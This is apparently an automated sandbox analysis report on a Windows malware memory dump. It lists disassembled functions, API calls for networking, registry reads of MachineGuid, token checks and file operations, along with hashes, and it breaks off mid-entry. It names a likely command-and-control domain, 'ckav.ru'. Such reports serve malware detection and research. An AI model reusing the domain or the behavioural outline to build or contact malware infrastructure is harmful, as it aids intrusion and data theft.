                                                • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv
                                                • String ID:
                                                • API String ID: 1507349165-0
                                                • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 231->235 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 259 406311-406317 call 402bab 257->259 260 406318-40631e 257->260 259->260 265 406320-406326 call 402bab 260->265 266 406327 260->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062df call 4031e5 262->273 263->257 265->266 266->235 272->254 278 4062e2-4062e4 273->278 278->272 279 4062e6-4062f3 call 405b6f 278->279 279->272
                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                • _wmemset.LIBCMT ref: 00406244
                                                • _wmemset.LIBCMT ref: 00406261
                                                • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _wmemset$ErrorInformationLastToken
                                                • String ID: IDA$IDA
                                                • API String ID: 487585393-2020647798
                                                • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                                • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                                • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 553 404ec7-404ec9 542->553 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 547 404ec0-404ec6 call 402bab 545->547 548 404ecb 545->548 546->545 547->553 552 404ecd-404ece 548->552 552->539 553->552
                                                APIs
                                                • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                • socket.WS2_32(?,?,?), ref: 00404E7A
                                                • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: freeaddrinfogetaddrinfosocket
                                                • String ID:
                                                • API String ID: 2479546573-0
                                                • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                                • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                                • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$AllocCreateReadVirtual
                                                • String ID: .tmp
                                                • API String ID: 3585551309-2986845003
                                                • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                • GetLastError.KERNEL32 ref: 0041399E
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Error$CreateLastModeMutex
                                                • String ID:
                                                • API String ID: 3448925889-0
                                                • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CreatePointerWrite
                                                • String ID:
                                                • API String ID: 3672724799-0
                                                • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                  • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                  • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                  • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$CreateFreeProcessThread_wmemset
                                                • String ID: ckav.ru
                                                • API String ID: 2915393847-2696028687
                                                • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                • _wmemset.LIBCMT ref: 0040634F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateProcess_wmemset
                                                • String ID: CA
                                                • API String ID: 2773065342-1052703068
                                                • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                                • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                                • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InformationToken
                                                • String ID: IDA
                                                • API String ID: 4114910276-365204570
                                                • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                                • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc
                                                • String ID: s1@
                                                • API String ID: 190572456-427247929
                                                • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                                • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateOpenProcessQueryValue
                                                • String ID:
                                                • API String ID: 1425999871-0
                                                • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                                • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                                • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CheckMembershipToken
                                                • String ID:
                                                • API String ID: 1351025785-0
                                                • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateDirectory
                                                • String ID:
                                                • API String ID: 4241100979-0
                                                • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoNativeSystem
                                                • String ID:
                                                • API String ID: 1721193555-0
                                                • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: send
                                                • String ID:
                                                • API String ID: 2809346765-0
                                                • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileMove
                                                • String ID:
                                                • API String ID: 3562171763-0
                                                • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID:
                                                • API String ID: 724789610-0
                                                • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseFind
                                                • String ID:
                                                • API String ID: 1863332320-0
                                                • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
